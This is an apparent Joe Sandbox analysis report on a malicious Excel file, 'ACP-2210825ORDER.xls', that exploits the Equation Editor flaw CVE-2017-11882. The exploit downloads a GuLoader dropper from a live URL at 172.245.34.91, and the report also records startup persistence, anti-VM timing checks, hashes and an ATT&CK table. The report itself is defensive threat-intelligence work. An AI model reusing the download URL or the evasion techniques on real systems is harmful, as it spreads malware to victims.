Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

5_2_0040344A

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404CED		5_2_00404CED
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004068DA		5_2_004068DA

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: ACP-2210825ORDER.xls	OLE indicator, VBA macros: true
Source: ~DF688530565CAD41F4.TMP.0.dr	OLE indicator, VBA macros: true

Source: libgiognutls.dll.5.dr

Static PE information: Number of sections : 11 > 10

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: ACP-2210825ORDER.xls

Virustotal: Detection: 26%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

5_2_0040344A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8371.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@4/20@0/1

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00402104 CoCreateInstance,

5_2_00402104

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

5_2_00404771

Source: ACP-2210825ORDER.xls	OLE indicator, Workbook stream: true
Source: ~DF688530565CAD41F4.TMP.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ACP-2210825ORDER.xls

Static file information: File size 1130496 > 1048576

Source: ACP-2210825ORDER.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe

Code function: 5_2_10002DE0 push eax; ret

5_2_10002E0E

Source: libgiognutls.dll.5.dr

Static PE information: section name: .xdata

Source: C:\Users\Public\vbc.exe

Code function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

5_2_10001B18

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035406CF

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93	Jump to behavior
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.Bib	Jump to behavior
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges	Jump to behavior
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen	Jump to behavior
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac	Jump to behavior
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 00000000030C53D8 second address: 00000000030C53D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F2BE4B89A38h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, 39h 0x0000000a rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1488

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll

Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00406555 FindFirstFileW,FindClose,	5_2_00406555
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_00405A03
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040287E FindFirstFileW,	5_2_0040287E

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-558
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-616
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node	graph_5-4321
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node	graph_5-4479

Source: vbc.exe, 00000005.00000002.1184749045.00000000002E4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\vbc.exe

Code function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

5_2_10001B18

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03540729 mov edx, dword ptr fs:[00000030h]

2_2_03540729

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

5_2_0040344A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Scripting	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	111 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	33 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	22 Exploitation for Client Execution	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	21 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	15 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Scripting	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ACP-2210825ORDER.xls	27%	Virustotal		Browse
ACP-2210825ORDER.xls	100%	Avira	EXP/CVE-2017-11882.Gen

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll	2%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://172.245.34.91/5643/VBC.exej	0%	Avira URL Cloud	safe
http://172.245.34.91/5643/VBC.exel	0%	Avira URL Cloud	safe
http://172.245.34.91/5643/VBC.exehhC:	0%	Avira URL Cloud	safe
http://172.245.34.91/5643/VBC.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://172.245.34.91/5643/VBC.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://172.245.34.91/5643/VBC.exej	EQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://172.245.34.91/5643/VBC.exel	EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	vbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr	false		high
http://172.245.34.91/5643/VBC.exehhC:	EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.245.34.91	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755822
Start date and time:	2022-11-29 08:11:40 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ACP-2210825ORDER.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@4/20@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 85.8% (good quality ratio 84.3%) Quality average: 87.7% Quality standard deviation: 21.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 70 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:12:45	API Interceptor	102x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	https://hotelsmag.com/news	Get hash	malicious	Browse	144.168.212.107
	(RSV) .xls	Get hash	malicious	Browse	104.168.45.104
	NEW ORDER 40 container+MUSTANG.xls	Get hash	malicious	Browse	172.245.142.71
	NEW ORDER 40 container+MUSTANG.xls	Get hash	malicious	Browse	172.245.142.71
	New_order.xls	Get hash	malicious	Browse	198.46.178.149
	Product Enquiry.xls	Get hash	malicious	Browse	172.245.25.166
	Rappaport .xls	Get hash	malicious	Browse	104.168.45.104
	http://deswin.nl/kgd0b	Get hash	malicious	Browse	23.94.186.186
	produkta aptauja.xls	Get hash	malicious	Browse	172.245.25.166
	Order.xls	Get hash	malicious	Browse	198.46.178.149
	88xv2Mk9gR.exe	Get hash	malicious	Browse	192.3.110.135
	SOA 210233.xls	Get hash	malicious	Browse	192.3.101.26
	RFQ MR 27138.xls	Get hash	malicious	Browse	192.3.101.26
	CUSTOM CLEARNCE FORM E.xls	Get hash	malicious	Browse	192.3.101.26
	swift copy.xls	Get hash	malicious	Browse	172.245.25.166
	FORM E CUSTOM CLEARANCE.xls	Get hash	malicious	Browse	192.3.101.26
	rI7ZEuyP9n.exe	Get hash	malicious	Browse	198.12.91.245
	swiftX24-11-2022.xls	Get hash	malicious	Browse	192.3.101.138
	8Wdhve67B9.exe	Get hash	malicious	Browse	198.12.91.245
	Order.xls	Get hash	malicious	Browse	198.46.178.149

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll	Services_Jingce_Quotation28112022.exe	Get hash	malicious	Browse
	Services_Jingce_Quotation28112022.exe	Get hash	malicious	Browse
	98765434567890.exe	Get hash	malicious	Browse
	98765434567890.exe	Get hash	malicious	Browse
	ORI-0876543200987 (1).exe	Get hash	malicious	Browse
	DC-098432345678909 (2).exe	Get hash	malicious	Browse
	ORI-0876543200987 (1).exe	Get hash	malicious	Browse
	DC-098432345678909 (2).exe	Get hash	malicious	Browse
	https://repo.anaconda.com/miniconda/Miniconda3-py39_4.12.0-Windows-x86_64.exe	Get hash	malicious	Browse
	uWoMvSzdog.exe	Get hash	malicious	Browse
	uWoMvSzdog.exe	Get hash	malicious	Browse
	RFQ.exe	Get hash	malicious	Browse
	RFQ.exe	Get hash	malicious	Browse
	21831nRdnc.exe	Get hash	malicious	Browse
	21831nRdnc.exe	Get hash	malicious	Browse
	RFQ1258966.xls	Get hash	malicious	Browse
	Factura.exe	Get hash	malicious	Browse
	Factura.exe	Get hash	malicious	Browse
	Qoute for 04261LOMO-01418-LALIZAS UAE.exe	Get hash	malicious	Browse
	Qoute for 04261LOMO-01418-LALIZAS UAE.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	477800
Entropy (8bit):	7.505402259729816
Encrypted:	false
SSDEEP:	12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
MD5:	7081C4822CF1C7572DD82822B8F27C49
SHA1:	4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
SHA-256:	B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
SHA-512:	6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P.._...P...P..OP.._...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@..........................p............@.............................................h............5..X............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...0...............................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F090A1F.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	4056
Entropy (8bit):	1.929653848333741
Encrypted:	false
SSDEEP:	12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
MD5:	4A103FC1809C8EA381D2ACB5380EF4F6
SHA1:	6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
SHA-256:	1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
SHA-512:	77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A84DD94.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	2.2677225081522296
Encrypted:	false
SSDEEP:	96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
MD5:	5A977E68E4AD913CC2A9FC917F1CA510
SHA1:	D68C009CC5EE57A931D1BB1D062294F319C03183
SHA-256:	82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
SHA-512:	71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
Malicious:	false
Reputation:	low
Preview:	....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C485423.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	2.2677225081522296
Encrypted:	false
SSDEEP:	96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
MD5:	5A977E68E4AD913CC2A9FC917F1CA510
SHA1:	D68C009CC5EE57A931D1BB1D062294F319C03183
SHA-256:	82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
SHA-512:	71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
Malicious:	false
Reputation:	low
Preview:	....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\489D37C8.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	2.2754571047715912
Encrypted:	false
SSDEEP:	96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
MD5:	38A09794AE082E08EA4F8B6E517F4814
SHA1:	8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
SHA-256:	22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
SHA-512:	2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
Malicious:	false
Reputation:	low
Preview:	....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A546E2A.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	4056
Entropy (8bit):	1.929653848333741
Encrypted:	false
